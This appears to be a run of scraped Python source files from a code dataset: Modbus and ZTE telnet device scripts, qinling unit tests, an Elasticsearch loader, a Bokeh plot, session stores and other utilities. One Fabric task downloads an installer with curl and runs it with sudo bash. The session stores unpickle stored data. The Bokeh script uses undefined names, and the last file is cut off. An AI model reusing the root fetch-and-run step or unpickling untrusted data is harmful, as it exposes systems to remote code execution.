(cur * 64)\n\n\ndef device_writer(queue):\n \"\"\"Process new messages from a queue to write to device outputs\n\n :param queue: The queue to get new messages from\n \"\"\"\n while True:\n device, value = queue.get()\n rescale_value(value[0])\n txt = f\"Write({device}) = {value}\"\n log.debug(txt)\n if not device:\n continue\n # do any logic here to update your devices\n\n\n# --------------------------------------------------------------------------- #\n# initialize your device map\n# --------------------------------------------------------------------------- #\n\n\ndef read_device_map(path):\n \"\"\"Read the device path to address mapping from file::\n\n 0x0001,/dev/device1\n 0x0002,/dev/device2\n\n :param path: The path to the input file\n :returns: The input mapping file\n \"\"\"\n devices = {}\n with open(path, \"r\") as stream: # pylint: disable=unspecified-encoding\n for line in stream:\n piece = line.strip().split(\",\")\n devices[int(piece[0], 16)] = piece[1]\n return devices\n\n\ndef run_callback_server():\n \"\"\"Run callback server.\"\"\"\n # ----------------------------------------------------------------------- #\n # initialize your data 
store\n # ----------------------------------------------------------------------- #\n queue = Queue()\n devices = read_device_map(\"device-mapping\")\n block = CallbackDataBlock(devices, queue)\n store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)\n context = ModbusServerContext(slaves=store, single=True)\n\n # ----------------------------------------------------------------------- #\n # initialize the server information\n # ----------------------------------------------------------------------- #\n identity = ModbusDeviceIdentification(\n info_name={\n \"VendorName\": \"pymodbus\",\n \"ProductCode\": \"PM\",\n \"VendorUrl\": \"https://github.com/pymodbus-dev/pymodbus/\",\n \"ProductName\": \"pymodbus Server\",\n \"ModelName\": \"pymodbus Server\",\n \"MajorMinorRevision\": pymodbus_version,\n }\n )\n\n # ----------------------------------------------------------------------- #\n # run the server you want\n # ----------------------------------------------------------------------- #\n thread = Thread(target=device_writer, args=(queue,))\n thread.start()\n StartTcpServer(context, identity=identity, address=(\"localhost\", 5020))\n\n\nif __name__ == \"__main__\":\n run_callback_server()\n","sub_path":"examples/v2.5.3/callback_server.py","file_name":"callback_server.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"511896748","text":"# Copyright 2017 Catalyst IT Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom datetime import datetime\nimport json\nimport tempfile\n\nimport mock\n\nfrom qinling import status\nfrom qinling.tests.unit.api import base\nfrom qinling.tests.unit import base as unit_base\n\nTEST_CASE_NAME = 'TestFunctionController'\n\n\nclass TestFunctionController(base.APITest):\n def setUp(self):\n super(TestFunctionController, self).setUp()\n\n # Insert a runtime record in db for each test case. 
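(create_runtime here is assumed to be a helper provided by the APITest base class.) 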
The data will be\n # removed automatically in tear down.\n db_runtime = self.create_runtime(prefix=TEST_CASE_NAME)\n self.runtime_id = db_runtime.id\n\n @mock.patch('qinling.storage.file_system.FileSystemStorage.store')\n def test_post(self, mock_store):\n with tempfile.NamedTemporaryFile() as f:\n body = {\n 'name': self.rand_name('function', prefix=TEST_CASE_NAME),\n 'code': json.dumps({\"source\": \"package\"}),\n 'runtime_id': self.runtime_id,\n }\n resp = self.app.post(\n '/v1/functions',\n params=body,\n upload_files=[('package', f.name, f.read())]\n )\n\n self.assertEqual(201, resp.status_int)\n self.assertEqual(1, mock_store.call_count)\n\n body.update({'entry': 'main.main', 'code': {\"source\": \"package\"}})\n self._assertDictContainsSubset(resp.json, body)\n\n def test_get(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n expected = {\n 'id': db_func.id,\n \"code\": {\"source\": \"package\"},\n \"name\": db_func.name,\n 'entry': 'main.main',\n \"project_id\": unit_base.DEFAULT_PROJECT_ID,\n }\n\n resp = self.app.get('/v1/functions/%s' % db_func.id)\n\n self.assertEqual(200, resp.status_int)\n self._assertDictContainsSubset(resp.json, expected)\n\n def test_get_all(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n expected = {\n 'id': db_func.id,\n \"code\": json.dumps({\"source\": \"package\"}),\n \"name\": db_func.name,\n 'entry': 'main.main',\n \"project_id\": unit_base.DEFAULT_PROJECT_ID,\n }\n\n resp = self.app.get('/v1/functions')\n\n self.assertEqual(200, resp.status_int)\n actual = self._assert_single_item(\n resp.json['functions'], id=db_func.id\n )\n self._assertDictContainsSubset(actual, expected)\n\n def test_put_name(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n\n resp = self.app.put_json(\n '/v1/functions/%s' % db_func.id, {'name': 'new_name'}\n )\n\n self.assertEqual(200, resp.status_int)\n self.assertEqual('new_name', resp.json['name'])\n\n @mock.patch('qinling.storage.file_system.FileSystemStorage.store')\n @mock.patch('qinling.rpc.EngineClient.delete_function')\n def test_put_package(self, mock_delete_func, mock_store):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n\n with tempfile.NamedTemporaryFile() as f:\n resp = self.app.put(\n '/v1/functions/%s' % db_func.id,\n params={},\n upload_files=[('package', f.name, f.read())]\n )\n\n self.assertEqual(200, resp.status_int)\n self.assertEqual(1, mock_store.call_count)\n mock_delete_func.assert_called_once_with(db_func.id)\n\n @mock.patch('qinling.rpc.EngineClient.delete_function')\n @mock.patch('qinling.storage.file_system.FileSystemStorage.delete')\n def test_delete(self, mock_delete, mock_delete_func):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n resp = self.app.delete('/v1/functions/%s' % db_func.id)\n\n self.assertEqual(204, resp.status_int)\n mock_delete.assert_called_once_with(\n unit_base.DEFAULT_PROJECT_ID, db_func.id\n )\n mock_delete_func.assert_called_once_with(db_func.id)\n\n def test_delete_with_running_job(self):\n db_func = self.create_function(\n runtime_id=self.runtime_id, prefix=TEST_CASE_NAME\n )\n self.create_job(\n function_id=db_func.id,\n prefix=TEST_CASE_NAME,\n status=status.AVAILABLE,\n first_execution_time=datetime.utcnow(),\n next_execution_time=datetime.utcnow(),\n count=1\n )\n\n resp = self.app.delete(\n '/v1/functions/%s' % db_func.id,\n 
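# let the 403 come back as a normal response object instead of raising\n            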
expect_errors=True\n        )\n\n        self.assertEqual(403, resp.status_int)\n","sub_path":"qinling/tests/unit/api/controllers/v1/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"447866818","text":"import re\nfrom typing import Optional\n\nfrom djing.lib import process_lock\nfrom . import base\n\n\ndef get_onu_template(vlan_id: int, mac_addr: str):\n    template = (\n        'switchport mode hybrid vport 1',\n        'service-port 1 vport 1 user-vlan %d vlan %d' % (vlan_id, vlan_id),\n        'port-location format flexible-syntax vport 1',\n        'port-location sub-option remote-id enable vport 1',\n        'port-location sub-option remote-id name %s vport 1' % mac_addr,\n        'dhcp-option82 enable vport 1',\n        'dhcp-option82 trust true replace vport 1',\n        'ip dhcp snooping enable vport 1',\n        'ip-service ip-source-guard enable sport 1'\n    )\n    return template\n\n\ndef appy_config(onu_mac: str, sn: str, hostname: str, login: str, password: str, prompt: str, vlan: int):\n    onu_type = 'ZTE-F660'\n\n    # Log in\n    ch = base.MySpawn('telnet %s' % hostname)\n    ch.timeout = 15\n    ch.expect_exact('Username:')\n    ch.do_cmd(login, 'Password:')\n\n    choice = ch.do_cmd(password, ['bad password.', '%s#' % prompt])\n    if choice == 0:\n        raise base.ZteOltLoginFailed\n\n    ch.do_cmd('terminal length 0', '%s#' % prompt)\n    choice = ch.do_cmd('show gpon onu uncfg', ['No related information to show', '%s#' % prompt])\n    if choice == 0:\n        ch.close()\n        raise base.OnuZteRegisterError('unregistered onu not found, sn=%s' % sn)\n    elif choice == 1:\n        # Fetch the unregistered ONUs\n        unregistered_onu = base.get_unregistered_onu(\n            lines=ch.get_lines_before(),\n            serial=sn\n        )\n        if unregistered_onu is None:\n            ch.close()\n            raise base.OnuZteRegisterError('unregistered onu not found, sn=%s' % sn)\n        stack_num = int(unregistered_onu.get('stack_num'))\n        rack_num = int(unregistered_onu.get('rack_num'))\n        fiber_num = int(unregistered_onu.get('fiber_num'))\n\n        # Look up the registered ONUs to find a free ONU number\n        ch.do_cmd('show run int gpon-olt_%(stack)s/%(rack)s/%(fiber)s' % {\n            'stack': stack_num,\n            'rack': rack_num,\n            'fiber': fiber_num\n        }, '%s#' % prompt)\n        free_onu_number = base.get_free_registered_onu_number(\n            ch.get_lines_before()\n        )\n        if free_onu_number > 126:\n            ch.close()\n            raise base.ZTEFiberIsFull('olt fiber %d is full' % fiber_num)\n\n        # enter to config\n        ch.do_cmd('conf t', '%s(config)#' % prompt)\n        int_addr = '%d/%d/%d' % (\n            stack_num,\n            rack_num,\n            fiber_num\n        )\n\n        # go to olt interface\n        ch.do_cmd('interface gpon-olt_%s' % int_addr, '%s(config-if)#' % prompt)\n\n        # register onu on olt interface\n        ch.do_cmd('onu %d type %s sn %s' % (\n            free_onu_number,\n            onu_type,\n            sn\n        ), '%s(config-if)#' % prompt)\n        # register onu profile on olt interface\n        ch.do_cmd(\n            'onu %d profile line ZTE-F660-LINE remote ZTE-F660-ROUTER' % free_onu_number,\n            '%s(config-if)#' % prompt\n        )\n\n        # Exit from int olt\n        ch.do_cmd('exit', '%s(config)#' % prompt)\n\n        # Enter to int onu\n        ch.do_cmd('int gpon-onu_%(int_addr)s:%(onu_num)d' % {\n            'int_addr': int_addr,\n            'onu_num': free_onu_number\n        }, '%s(config-if)#' % prompt)\n\n        # Apply int onu config\n        template = get_onu_template(vlan, onu_mac)\n        for line in template:\n            ch.do_cmd(line, '%s(config-if)#' % prompt)\n\n        # Exit\n        ch.do_cmd('exit', '%s(config)#' % prompt)\n        ch.do_cmd('exit', '%s#' % prompt)\n        ch.close()\n        return base.onu_conv(\n            rack_num=rack_num,\n            fiber_num=fiber_num,\n            port_num=free_onu_number\n        )\n    else:\n        
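# any other pexpect branch means the OLT dialog went off-script\n        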
ch.close()\n raise base.ZteOltConsoleError(\"I don't know what choice:\", choice)\n\n\n# Main Entry point\n@process_lock\ndef register_onu(onu_mac: Optional[str], serial: str, zte_ip_addr: str, telnet_login: str,\n telnet_passw: str, telnet_prompt: str, onu_vlan: int):\n\n if not re.match(r'^ZTEG[0-9A-F]{8}$', serial):\n raise base.ExpectValidationError('Serial not valid, match: ^ZTEG[0-9A-F]{8}$')\n\n if not isinstance(onu_vlan, int):\n onu_vlan = int(onu_vlan)\n\n if onu_mac is None:\n onu_mac = base.sn_to_mac(serial)\n\n IP4_ADDR_REGEX = (\n r'^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.'\n r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'\n )\n if not re.match(IP4_ADDR_REGEX, zte_ip_addr):\n raise base.ExpectValidationError('ip address for zte not valid')\n\n return appy_config(onu_mac, serial, zte_ip_addr, telnet_login,\n telnet_passw, telnet_prompt, onu_vlan)\n","sub_path":"devapp/expect_scripts/f660.py","file_name":"f660.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"474650356","text":"import argparse\nimport logging\nimport pandas\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\nimport os.path\nimport json\nimport gzip\nimport re\nimport datetime\nimport calendar\n\nmonths = [x.lower() for x in list(calendar.month_name)]\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\"-i\", \"--input\", dest=\"input\", action=\"append\", nargs=2, help=\"Excel inputs of form -i FILE_NAME SHEET_NAME\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\")\n parser.add_argument(\"-H\", \"--host\", dest=\"host\", default=\"localhost\", help=\"Host\")\n parser.add_argument(\"-p\", \"--port\", dest=\"port\", type=int, default=9200, help=\"Port\")\n parser.add_argument(\"-I\", \"--index_name\", dest=\"index_name\", default=\"original_slavery\", help=\"Index name\")\n parser.add_argument(dest=\"inputs\", nargs=\"+\")\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.INFO)\n\n # inputs = {}\n # for fname, sname in args.input:\n # inputs[fname] = inputs.get(fname, []) + [sname]\n\n fields = set()\n actions = []\n #for fname, snames in inputs.items():\n for fname in args.inputs:\n logging.info(\"Reading file '%s'\", fname)\n sheets = pandas.read_excel(fname, sheet_name=None)\n for sname in [s for s in sheets.keys() if not s.startswith(\"DPCache\")]:\n logging.info(\"Processing sheet '%s'\", sname)\n sheet = sheets[sname]\n for field in sheet.iloc[0].to_dict().keys():\n if not field.startswith(\"Unnamed\"):\n fields.add(field.replace(\".\", \"_\"))\n for i in range(len(sheet)):\n item = {k.replace(\".\", \"_\") : str(v) for k, v in sheet.iloc[i].to_dict().items() if not k.startswith(\"Unnamed\")}\n item[\"source_file\"] = os.path.basename(fname)\n item[\"source_sheet\"] = sname\n item[\"source_row\"] = i + 2\n actions.append({\"_source\" : item, \"_index\" : args.index_name})\n properties = {f : {\"type\" : \"text\"} for f in fields}\n properties[\"source_file\"] = {\"type\" : \"keyword\"}\n properties[\"source_sheet\"] = {\"type\" : \"keyword\"}\n properties[\"source_row\"] = {\"type\" : \"integer\"}\n\n dates = [\"notice_event\", \"notice\", \"voyage_arrival\", \"voyage_departure\", \"voyage_manifest\"]\n numeric = [\"slave_age\", \"vessel_tonnage\", \"notice_reward_amount\", \"voyage_count\", \"notice_party_size\", 
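# count-like columns; coerced to float in the cleanup pass below\n               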
\"owner_count\"]\n coll_locs = [\"owner_location\", \"owner_state\", \"owner_county\", \"owner_city\", \"owner_country\"]\n remove = [\"voyage_port_2\"]\n \n if args.output:\n with gzip.open(args.output, \"wt\") as ofd:\n for a in actions:\n src = a[\"_source\"]\n for k in list(src.keys()):\n v = str(src[k])\n if re.match(\"^\\s*not\", v) or re.match(\"^\\s*\\?\\s*$\", v) or v == \"nan\":\n del src[k]\n else:\n src[k] = v.replace(\"?\", \"\").strip()\n for nf in numeric:\n if nf in src:\n try:\n src[nf] = float(src[nf])\n except:\n del src[nf]\n \n if any([l in src for l in coll_locs]):\n vals = []\n for k in coll_locs:\n if k in src:\n vals.append(src[k])\n del src[k]\n src[\"owner_location\"] = \" \".join(vals)\n for d in dates:\n df = \"{}_day\".format(d)\n ddf = \"{}_date\".format(d)\n mf = \"{}_month\".format(d)\n yf = \"{}_year\".format(d)\n if ddf in src:\n toks = src[ddf].split()\n #del src[ddf]\n if len(toks) == 3:\n day, month, year = toks\n day = int(day)\n if day > 31:\n day = 28\n month = src[mf]\n year = int(float(src[yf]))\n #try:\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n elif len(toks) == 2:\n month, year = toks\n day = 1\n try:\n year = int(float(year))\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n except:\n if ddf in src:\n del src[ddf] \n #except:\n # print(src)\n\n elif all([x in src for x in [df, mf, yf]]):\n try:\n day = int(float(src[df]))\n month = src[mf]\n year = int(float(src[yf]))\n date = \"{} {} {}\".format(year, month, day)\n src[ddf] = datetime.date(year, months.index(month.lower()), day).toordinal()\n #src[ddf] = src.get(ddf, date)\n except:\n if ddf in src:\n del src[ddf]\n elif ddf in src:\n del src[ddf] \n for f in [df, mf, yf] + remove:\n if f in src:\n del src[f]\n \n for pt in [\"author\", \"slave\", \"owner\", \"shipper\", \"captain\", \"consignor\"]:\n s = \"{}_sex\".format(pt)\n if s in src: \n src[s] = src[s].lower()\n if src[s] not in [\"m\", \"f\"]:\n del src[s]\n #print(src[s])\n #print(src)\n \n fn = \"{}_first_name\".format(pt)\n ln = \"{}_last_name\".format(pt)\n if ln in src or fn in src:\n parts = ([src[fn]] if fn in src else []) + ([src[ln]] if ln in src else [])\n src[\"{}_name\".format(pt)] = \" \".join(parts)\n if ln in src:\n del src[ln]\n if fn in src:\n del src[fn]\n \n oc = \"{}_owner_count\".format(pt)\n if oc in src:\n try:\n src[oc] = float(src[oc])\n except:\n del src[oc]\n \n hf = \"{}_height_feet\".format(pt)\n hi = \"{}_height_inches\".format(pt)\n if hf in src:\n\n feet = float(src[hf])\n if hi in src:\n inches = float(src[hi])\n else:\n inches = 0.0\n src[\"{}_height\".format(pt)] = feet + (inches / 12.0)\n del src[hf]\n if hi in src:\n del src[hi]\n src[\"source_row\"] = int(src[\"source_row\"])\n ofd.write(json.dumps(src) + \"\\n\")\n else:\n es = Elasticsearch([{\"host\" : args.host, \"port\" : args.port}])\n if es.indices.exists(args.index_name):\n es.indices.delete(index=args.index_name) \n\n es.indices.create(index=args.index_name, body={\"mappings\" : {\"properties\" : properties}})\n es.indices.put_settings(index=args.index_name, body={\"index\" : { \"max_result_window\" : 500000 }})\n\n bulk(index=args.index_name, actions=actions, raise_on_error=True, client=es)\n","sub_path":"src/load_from_excel.py","file_name":"load_from_excel.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"584714193","text":"\"\"\"\n=======================\nMaxime RDF 
Calculations\n=======================\n\"\"\"\n\nimport os\nimport sys\nimport pandas as pd\nfrom bokeh.palettes import Category20\nfrom bokeh.models import Select\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.plotting import curdoc, figure\n# Add the parent path so that bokeh --serve can see the `vis`\n# module and import it.\nsys.path.insert(\n    0,\n    os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom vis.utils import read_rdf\n\n# Read the desired metadata file:\n# This returns a list of dataframes.\ndata_frames = read_rdf('metadata.json', char_types=['Aluminate Species'])\n\n# Define colors and sizes to be used later.\nSIZES = list(range(6, 22, 3))\nCOLORS = Category20[20]\n\n# Data wrangling.\nysl = [df['RDF_Al-Ob'] for df in data_frames]\nxsl = [df['r'] for df in data_frames]\n\n# Use the first frame for the selectable scatter view and derive the column\n# groupings that the selectors below rely on (this split follows the standard\n# Bokeh crossfilter pattern and is assumed to match the read_rdf output).\ndf = data_frames[0]\ncolumns = sorted(df.columns)\ndiscrete = [c for c in columns if df[c].dtype == object]\ncontinuous = [c for c in columns if c not in discrete]\nquantileable = [c for c in continuous if len(df[c].unique()) > 20]\n\ndef create_figure():\n\n    # Assign the x and y values to those selected.\n    xs = df[x_sel.value].values\n    ys = df[y_sel.value].values\n\n    # Get the titles from those selected.\n    x_title = x_sel.value.title()\n    y_title = y_sel.value.title()\n\n    # Create a dictionary to pass to the bokeh plot.\n    kw = dict()\n\n    # Check if the x and y axis values are discrete.\n    # if so use the low level dict key word to set the range appropriately.\n    if x_sel.value in discrete:\n        kw['x_range'] = sorted(set(xs))\n    if y_sel.value in discrete:\n        kw['y_range'] = sorted(set(ys))\n\n    # Set a default size for the points\n    # sz = 9\n    # if size.value != 'None':\n    #     if size.value in discrete:\n    #         sz = [SIZES[xx] for xx in df[size.value].factorize()[0]]\n    #     else:\n    #         groups = pd.qcut(df[size.value].values, len(SIZES), duplicates='drop')\n    #         sz = [SIZES[xx] for xx in groups.codes]\n    # Set the default color\n    c = '#31AADE'\n    if color.value != 'None':\n        if color.value in discrete:\n            c = [COLORS[xx] for xx in df[color.value].factorize()[0]]\n        else:\n            groups = pd.qcut(\n                df[color.value].values, len(SIZES), duplicates='drop')\n            c = [COLORS[xx] for xx in groups.codes]\n    # Assign the titles.\n    fig = figure(\n        plot_height=600,\n        plot_width=800,\n        tools='pan,box_zoom,reset',\n        **kw,\n    )\n    fig.xaxis.axis_label = x_title\n    fig.yaxis.axis_label = y_title\n    fig.circle(\n        x=xs,\n        y=ys,\n        color=c,\n        # size=sz,\n        line_color=None,\n        alpha=0.7,\n        hover_color='white',\n        hover_alpha=0.5,\n    )\n\n    return fig\n\n\ndef update(attr, old, new):\n    layout.children[1] = create_figure()\n    return\n\n\n# Create the inputs\nx_sel = Select(\n    title='X-Axis',\n    value='r',\n    options=columns)\nx_sel.on_change('value', update)\n\ny_sel = Select(\n    title='Y-Axis',\n    value='RDF_Al-Ob',  # assumed to exist in the RDF frames (see wrangling above)\n    options=columns)\ny_sel.on_change('value', update)\n\n# Create the color input.\ncolor = Select(\n    title='Color',\n    value='None',\n    options=['None'] + discrete + quantileable)\ncolor.on_change('value', update)\n\n# Create the size input\n# size = Select(title='Size', value='None', options=['None'] + quantileable)\n# size.on_change('value', update)\n\n# Create a list of the controls\ncontrols = widgetbox([x_sel, y_sel, color], width=200)\n\n# Create the layout\nlayout = row(controls, create_figure())\n\n# Add to the current doc.\ncurdoc().add_root(layout)\ncurdoc().title = \"Maxime RDF\"
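\n\n# This script drives a Bokeh document through curdoc(), so it is meant for the\n# Bokeh server; a typical (assumed) invocation from the repository root:\n#   bokeh serve --show vis/maxime_rdf_vis.py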
\n# Create client socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# SSL\n#ts = ssl.wrap_socket(s, certfile=\"100352212.crt\", keyfile=\"100352212.key\", ca_certs=\"5cc515-root-ca.cer\")\n\n# Connect socket to server\ns.connect((\"127.0.0.1\", 4000))\n\n# Greetings Exchange\ns.sendall(\"Hello\\r\\n\".encode())\n\n# Salutations upon receipt of the greeting\nif(s.recv(10000).decode() == \"Greetings\\r\\n\"):\n    print(\"Welcome to the guess the number game! \")\n\n# Game Loop\nwhile not gameLoop:\n    # Input and send guess\n    try:\n        guess = int(input(\"What is your guess? \"))\n    except ValueError:\n        print(\"That was not a valid guess. Try again...\")\n        continue\n    intGuess = (\"Guess: %i\\r\\n\" % (guess))\n    try:\n        s.sendall(intGuess.encode())\n        # Assess result\n        assessment = (s.recv(10000).decode())\n    except OSError:\n        print(\"Cannot connect to server, closing the program.\")\n        sys.exit()\n\n    if(assessment == \"Correct\\r\\n\"):\n        print(\"You guessed correctly!\")\n        gameLoop = True\n    elif(assessment == \"Close\\r\\n\"):\n        print(\"You are getting close!\")\n    elif(assessment == \"Far\\r\\n\"):\n        print(\"You are way off.\")\n\ns.close()\n","sub_path":"pclient.py","file_name":"pclient.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135129894","text":"import boto3\nfrom fabric.api import env, sudo, run, task\nfrom fabric.colors import green\n\n\n@task\ndef status():\n    print(green('AWS Agent status for {host}'.format(**env)))\n    sudo('/opt/aws/awsagent/bin/awsagent status')\n\n\n@task\ndef install():\n    print(green('Downloading AWS Agent installation script'))\n    run('curl -O https://d1wk0tztpsntt1.cloudfront.net/linux/latest/install')\n\n    print(green('Installing AWS Agent'))\n    run('sudo bash install')\n\n\n@task\ndef validate_install():\n    pass\n\n\n@task\ndef start():\n    print(green('Starting AWS Agent'))\n    sudo('/etc/init.d/awsagent start')\n\n\n@task\ndef stop():\n    print(green('Stopping AWS Agent'))\n    sudo('/etc/init.d/awsagent stop')\n\n\n@task\ndef get_cluster_instances(cluster=None):\n    if cluster is None:\n        print('No cluster specified')\n        return\n    client = boto3.client('ecs')\n    response = client.list_container_instances(cluster=cluster)\n    print(response)\n","sub_path":"awsagent.py","file_name":"awsagent.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91325611","text":"def is_square(xss):\n\tif xss == []:\n\t\treturn True\n\tlen_xss = len(xss)\n\tlen_xss_0 = len(xss[0])\n\tfor x in xss:\n\t\tif (len(x) != len_xss) or (len(x) != len_xss_0):\n\t\t\treturn False\n\treturn True\n\ndef diagonal_vals(xss):\n\tif not is_square(xss):\n\t\treturn None\n\treturn [xss[i][i] for i in range(len(xss))]\n\n\n
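The client above speaks a tiny line protocol: "Hello" answered by "Greetings", then "Guess: N" answered by Correct/Close/Far. The matching server is not part of this record; a hypothetical counterpart, just to make the exchange concrete (the secret's range and the ±5 "close" band are assumptions):

import random
import socket

def serve(host='127.0.0.1', port=4000):
    secret = random.randint(1, 100)  # range is a guess; the client never learns it
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            # Greetings exchange, mirroring the client's opening message.
            if conn.recv(1024).decode().strip() == 'Hello':
                conn.sendall(b'Greetings\r\n')
            while True:
                line = conn.recv(1024).decode().strip()
                if not line.startswith('Guess:'):
                    break
                guess = int(line.split(':', 1)[1])
                if guess == secret:
                    conn.sendall(b'Correct\r\n')
                    break
                conn.sendall(b'Close\r\n' if abs(guess - secret) <= 5 else b'Far\r\n')

if __name__ == '__main__':
    serve()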
# diagonal_vals(xss): Given a list of lists of values xss, if the structure is square, return the values on the\n# diagonal from top-left to bottom-right as a list. If it's not square, return None.\n# • assume: xss is a list of lists of any Python values.\n# • diagonal_vals ( [[1,2,3], [4,5,6], [7,8,9]] ) → [1, 5, 9]\n# • diagonal_vals ( [[1,2,3], [4,5]] ) → None\n# • diagonal_vals ( [['a','b'], ['c','d']] ) → ['a', 'd']\n# • diagonal_vals([]) → []","sub_path":"CS112/Project 5/diagonal_vals.py","file_name":"diagonal_vals.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"397330024","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\nfrom setuptools import setup\n\nversion = \"1.4.1\"\n\n# read the contents of your README file\n\nlong_description = (Path(__file__).parent / \"README.md\").read_text()\n\nsetup(\n    name=\"structlog-sentry\",\n    version=version,\n    description=\"Sentry integration for structlog\",\n    author=\"Kiwi.com platform\",\n    author_email=\"platform@kiwi.com\",\n    packages=[\"structlog_sentry\"],\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    license=\"MIT\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"281319363","text":"# -*- coding: utf-8 -*-\n__all__ = ['BDBSessionStore', 'FilesystemSessionStore', 'MemorySessionStore',\n           'dummy_session']\nimport os\ntry:\n    from cPickle import dumps, loads, HIGHEST_PROTOCOL\nexcept ImportError:\n    from pickle import dumps, loads, HIGHEST_PROTOCOL\nfrom werkzeug.contrib.sessions import FilesystemSessionStore, SessionStore, \\\n     Session\n\n\nclass DummySession(object):\n    should_save = False\ndummy_session = DummySession()\n\n\nclass FilesystemLevelSessionStore(FilesystemSessionStore):\n    def __init__(self, path=None, level=1):\n        self.level = level\n        s = '%s/' * level\n        FilesystemSessionStore.__init__(self, path,\n            filename_template=s+'werkzeug_%s.sess')\n\n    def get_session_filename(self, sid):\n        args = []\n        for i in range(self.level):\n            args.append(sid[i])\n        args.append(sid)\n        return os.path.join(self.path, self.filename_template % tuple(args))\n\n\nclass BDBSessionStore(SessionStore):\n    def __init__(self, file_path=None, session_class=Session):\n        import bsddb\n        SessionStore.__init__(self, session_class)\n        if file_path is None:\n            from tempfile import gettempdir\n            file_path = os.path.join(gettempdir(), 'session.bdb')\n        self.db = bsddb.hashopen(file_path)\n\n    def save(self, session):\n        self.db[str(session.sid)] = dumps(dict(session), HIGHEST_PROTOCOL)\n        self.db.sync()\n\n    def delete(self, session):\n        try:\n            del self.db[str(session.sid)]\n        except KeyError:\n            pass\n        else:\n            self.db.sync()\n\n    def get(self, sid):\n        session = self.db.get(str(sid))\n        if not session:\n            session = self.new()\n        else:\n            session = self.session_class(loads(session), sid, False)\n        return session\n\n\nclass MemorySessionStore(SessionStore):\n    def __init__(self, session_class=Session):\n        SessionStore.__init__(self, session_class)\n        self.db = {}\n\n    def save(self, session):\n        self.db[session.sid] = session\n\n    def delete(self, session):\n        self.db.pop(session.sid, None)\n\n    def get(self, sid):\n        try:\n            return self.db[sid]\n        except KeyError:\n            return self.new()\n\n\nclass MemcachedSessionStore(SessionStore):\n    def __init__(self, servers, session_class=Session):\n        SessionStore.__init__(self, session_class)\n        import memcache\n        self.client = memcache.Client(servers)\n\n    def save(self, session):\n        s = dumps(dict(session), HIGHEST_PROTOCOL)\n        
self.client.set(str(session.sid), s)\n\n def delete(self, session):\n self.client.delete(str(session.sid))\n\n def get(self, sid):\n session = self.client.get(str(sid))\n if session is None:\n session = self.new()\n else:\n session = self.session_class(loads(session), sid, False)\n return session\n\n\nclass GAESessionStore(SessionStore):\n def __init__(self, session_class=Session):\n SessionStore.__init__(self, session_class)\n from google.appengine.api import memcache\n self.client = memcache\n","sub_path":"branches/67/accost/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"216139058","text":"import os\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\nimport tensorflow as tf\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True, log_device_placement=True))\n\n\nfrom keras.models import model_from_json, Sequential\nfrom keras.preprocessing import sequence\nimport numpy as np\nimport math\nimport logging\nimport sys\nimport time\nimport nltk\nimport data_generator\nfrom 